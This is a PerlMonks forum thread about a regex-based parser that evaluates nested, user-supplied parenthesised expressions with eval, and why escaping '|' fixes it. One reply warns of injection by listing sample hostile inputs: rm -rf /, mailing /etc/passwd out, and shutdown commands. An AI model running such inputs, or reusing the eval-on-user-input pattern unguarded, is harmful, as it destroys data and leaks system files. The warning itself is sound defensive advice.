Moe has asked for the wisdom of the Perl Monks concerning the following question:

I am writing a parser that takes a user-specified string and evaluates the tokens within it. A token in this case meaning an expression grouped within parentheses. The idea is to take one string, and recursively replace each token with its evaluated value. So, (2 > 1) would be replaced with 1. This would allow any combination of tokens to be grouped into a string of nested parentheses, and then be parsed. The code that follows does this quite well...up until the very last replacement, when there is just one token left. And as a result, I'm rather puzzled. This is a test case of code, written to output what it's doing.
#! /usr/bin/perl #sample string. $string = "((2 > 1) | ('word' eq 'toy'))"; #next line converts user-specified operators into Perl #logical operators. $string =~ s/([&|]{1})/$1$1/g; print "Initial parsed string = $string\n"; #Look ahead assertion. while ($string =~ /\(((?:[^()])*?)\)/) { my $val = (eval $1) ? 1 : 0; print "Case to be evaluated = $1\n"; print "Evaluated value = $val\n"; $string =~ s/\($1\)/$val/; print "Parsed string = $string\n"; } print "Result: $string\n";
The code as shown above will end with 1|| 0), instead of just 1. However, if I change the | to & in the test string? It works fine. Which puzzles me to no end. So Great Monks, whose wisdom far outstrips mine own...how do I make this work more consistently? ~Moe~

Replies are listed 'Best First'.
Re: Parsing parenthetical arguments recursively
by Moe (Novice) on Aug 15, 2003 at 18:07 UTC
    And a colleague looking over my shoulder points and says: You have to escape your |'s. And I stare. And I splutter. And I try what he suggests, and it appears to work miraculously well.

    If the Great Holy Monks have further input, I am forever grateful.

    Revised code:
    #! /usr/bin/perl #sample string. $string = "((2 > 1) | ('word' eq 'toy'))"; #next line converts user-specified operators into Perl #logical operators. $string =~ s/([&|]{1})/$1$1/g; print "Initial parsed string = $string\n"; #Look ahead assertion. while ($string =~ /\(((?:[^()])*?)\)/) { my $assert = $1; my $val = (eval $1) ? 1 : 0; print "Case to be evaluated = $1\n"; print "Evaluated value = $val\n"; $assert =~ s/\|\|/\\\|\\\|/g; $string =~ s/\($assert\)/$val/; print "Parsed string = $string\n"; } print "Result: $string\n";
      Its possible you want to quotemeta() $assert instead, but I could see it going either way.
      So you don't want to test and reject unbalanced parens? for instance:
      $string = "((2 > 1) | ('word' eq 'toy')))";
      If you did you may want to use one of the balanced modules to verify balance of the parens.

      -Waswas
        The same code(now working) is being used to accomplish that, actually. I use the same regexp when the user supplies the expression to verify its validity, without doing any evaluation on it:

        while ($tmp =~ /\(((?:[^()])*?)\)/) { my $assert = $1; $assert =~ s/\|/\\\|/g; $tmp =~ s/\($assert\)/$1/; } ($tmp =~ /\(|\)/) ? print "Don't match.\n" : print "Match.\n";

        Just as a purely hypothetical example. Though, I will definitely look into those modules, as I'd not heard of them before. Thank you for the link.

        ~Moe~
Re: Parsing parenthetical arguments recursively
by dragonchild (Archbishop) on Aug 15, 2003 at 17:53 UTC
    I hope you're taking care to prevent strings like:
    (`rm -rf /`;) (`mail /etc/passwd me@myhost.com`;) (system "shutdown -rf";) (open ABCD, "-|", "shutdown -rf";)

    ------
    We are the carpenters and bricklayers of the Information Age.

    The idea is a little like C++ templates, except not quite so brain-meltingly complicated. -- TheDamian, Exegesis 6

    Please remember that I'm crufty and crochety. All opinions are purely mine and all code is untested, unless otherwise specified.

      Yes.
      The 'real' version of the code disallows backticks, specifically, and only allows a very specific list of arguments to each token expression. I didn't include that part because it works, whereas the parenthetical matching does not.
      Though you did make me run each of those through as a test case, to make sure it would disallow them. Thank you.
      ~Moe~